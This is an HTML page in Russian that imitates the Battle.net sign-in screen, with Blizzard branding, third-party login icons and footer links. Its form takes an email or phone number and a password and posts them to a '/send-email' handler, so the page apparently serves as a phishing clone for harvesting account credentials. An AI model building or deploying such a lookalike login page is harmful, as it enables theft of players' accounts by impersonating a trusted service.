<html>
    <head>
        <meta charset="utf-8">
        <title> Новая вкладка </title>
        <style>
            @import url('https://fonts.cdnfonts.com/css/object-sans');
            @import url('https://fonts.googleapis.com/css2?family=Noto+Sans:wght@300&family=Roboto:wght@300&display=swap');
            @import url('https://fonts.googleapis.com/css2?family=Noto+Sans&family=Roboto:wght@300&display=swap');
            @import url('https://fonts.googleapis.com/css2?family=Noto+Sans:wght@500&display=swap');
            @import url('https://fonts.googleapis.com/css2?family=Noto+Sans:wght@700&display=swap');
            @import url('https://fonts.googleapis.com/css2?family=Noto+Sans&display=swap');
            body{
                background-color: #15171E;
            }
            .BattelNet_logo{
                margin-top: 40px;
                margin-left: 587px;
                width: 240px;
                height: 72px;
            }

            h3{
                font-weight: 700;
                line-height: 36px;
                margin-left: 575px;
                margin-top: 40;
                margin-bottom: 0;
                font-size: 32px;
                color: #fff;
                font-family: "Object Sans", "Arial", "Helvetica", "Segoe UI Symbol", "Segoe MDL2 Assets", sans-serif;
            }

            .Google_logo{
                width: 50;
                height: auto;
                margin-left: 610;
                margin-top: 27;
            }

            .Facebook_logo{
                width: 50;
                height: auto;
                margin-left: 18;
                margin-top: 50;
            }

            .Apple_logo{
                width: 50;
                height: auto;
                margin-left: 18;
                margin-top: 27;
            }

            .Xbox_logo{
                width: 50;
                height: auto;
                margin-left: 574;
                margin-top: 18;
            }

            .PS_logo{
                width: 50;
                height: auto;
                margin-left: 18;
                margin-top: 18;
            }
            
            .Nintendo_logo{
                width: 50;
                height: auto;
                margin-left: 18;
                margin-top: 18;
            }

            .Steam_logo{
                width: 50;
                height: auto;
                margin-left: 18;
                margin-top: 18;
            }

            .Thirdparty-line{
                position: relative;
                font-size: 15.5px;
                font-family: "Noto Sans", "Object Sans", sans-serif;
                color: rgba(255, 255, 255, 0.6);
                text-align: center;
                font-weight: 700;
                line-height: 21px;
                margin-top: 44px;
                margin-bottom: 24px;
            }

            .Line_right{
                position: absolute;
                background-color: rgba(255, 255, 255, 0.18);
                width: 120px;
                height: 1px;
                top: 10px;
                left: 795px;
            }

            .Line_left{
                position: absolute;
                background-color: rgba(255, 255, 255, 0.18);
                width: 125px;
                height: 1px;
                top: 10px;
                left: 500px;
            }

            .Input_label{
                align-items: center;
                width: 415px;
                height: 40px;
                border-radius: 4px;
                border: 1px solid rgba(255, 255, 255, 0.36);
                margin-left: 500;
                margin-bottom: 18px;
            }

            .Button{
                background-color: #0074e0;
                border-radius: 4px;
                height: 40px;
                width: 415px;
                margin-top: 44px;
                margin-left: 500px;
            }

            .Text_label{
                color: rgba(255, 255, 255, 0.36);
                font-family: "Noto Sans", "Georgia", "Times New Roman", "Times", "Segoe UI Symbol", "Segoe MDL2 Assets", serif;
                font-size: 16px;
                margin-top: 10px;
                margin-left: 10px;
            }

            .Text_button{
                color: #fff;
                font-size: 16px;
                margin-left: 160px;
                padding-top: 8px;
                font-weight: 700px;
                font-family: "Noto Sans", "Object Sans", sans-serif;
            }

            .Help_link{
                text-align: center;
            }

            .Link_one{
                font-family: 'Noto Sans', sans-serif;
                font-weight: 700;
                color: #47a6ff;
                font-size: 16px;
                margin-top: 53;
            }

            .Link_two{
                font-family: 'Noto Sans', sans-serif;
                font-weight: 700;
                color: #47a6ff;
                font-size: 16px;
                margin-top: 27px;
            }

            .Info_link{
                text-align: center;
                margin-top: 68px;
            }

            .Nav_item{
                margin-left: 407;
                font-size: 12px;
                font-weight: 400;
                color: rgba(255, 255, 255, 0.7);
                font-family: 'Noto Sans', sans-serif;
                display: flex;
            }

            .Nav_item_2{
                margin-left: 530;
                font-size: 12px;
                font-weight: 400;
                color: rgba(255, 255, 255, 0.7);
                font-family: 'Noto Sans', sans-serif;
                display: flex;
            }

            .Text_info{
                margin-left: 4;
                margin-right: 4;
                margin-bottom: 0;
                margin-top: 4;
            }

            .Text_info_cookie{
                margin-left: 4;
                margin-right: 4;
                margin-bottom: 0;
                margin-top: 4;
                color: #0074e0;
            }

            .Company{
                text-align: center;
                margin-top: 0px;
                margin-bottom: 50px;
            }

            .Company_text{
                font-size: 12px;
                color: rgba(255, 255, 255, 0.3);
            }

        </style>
    </head>
    <body>
        <div class="Main_page">
            <img class="BattelNet_logo" src = "Assets/logo-horizontal-color-light.1z1fI.svg" alt="">
            <h3 id="Login-header">Авторизоваться</h3>
            <img class="Google_logo" src="Assets/Google_logo.png">
            <img class="Facebook_logo" src="Assets/facebook_logo.png">
            <img class="Apple_logo" src="Assets/Apple_logo.png">
            <br>
            <img class="Xbox_logo" src="Assets/Xbox_logo.png">
            <img class="PS_logo" src="Assets/PS_logo.png">
            <img class="Nintendo_logo" src="Assets/Nintendo_logo.png">
            <img class="Steam_logo" src = "Assets/Steam_logo.png">
            <div class="Thirdparty-line">
                <div class="Line_right"></div>
                или войти через
                <div class="Line_left"></div>
            </div>
            <form action="/send-email" method="post">
                <div id="login-input-container">
                    <div class="Input_label ">
                        <div class="controls">
                            <label>
                                <input maxlength="320" type="text" class="input-block " name="email"
                                       placeholder="Электронная почта или телефон">
                            </label>
                        </div>
                    </div>
                    <div class="Input_label">
                        <div class="controls">
                            <div class="blz-password-wrapper">
                                <input name="password" title="Пароль" maxlength="128" type="password" name="password"
                                       class="input-block "
                                       placeholder="Пароль">
                            </div>
                        </div>
                    </div>
                </div>
                <div class="Button">
                    <button class="btn-block btn btn-primary submit-button btn-block">
                        Авторизоваться
                    </button>
                </div>
            </form>
            <div class="Help_link">
                <div class="Link_one">
                    Зарегистрируйте учетную запись Battle.net <br> бесплатно
                </div>
                <div class="Link_two">
                    Вы не можете войти? 
                </div>
            </div>
            <div class="Info_link">
                <div class = "Nav_item">
                    <p class="Text_info">ПОЛЬЗОВАТЕЛЬСКОЕ СОГЛАШЕНИЕ BLIZZARD</p>
                    <p class="Text_info">|</p>
                    <p class="Text_info">ПОЛИТИКА КОНФИДЕНЦИАЛЬНОСТИ</p>
                    <p class="Text_info">|</p>
                    <p class="Text_info">УСЛОВИЯ</p>
                    <p class="Text_info">|</p>
                </div>
                <div class="Nav_item_2">
                    <p class="Text_info">АВТОРСКОЕ ПРАВО</p>
                    <p class="Text_info">|</p>
                    <p class="Text_info_cookie">ФАЙЛЫ COOKIE</p> 
                    <p class="Text_info">|</p>
                    <p class="Text_info">ПАРАМЕТРЫ COOKIE</p>
                </div>
                <div class="Comapany">
                    <p class="Company_text"> © BLIZZARD ENTERTAINMENT, INC., 2023 </p>
                </div>
            </div>
        </div>
        <footer>

        </footer>
    </body>
</html>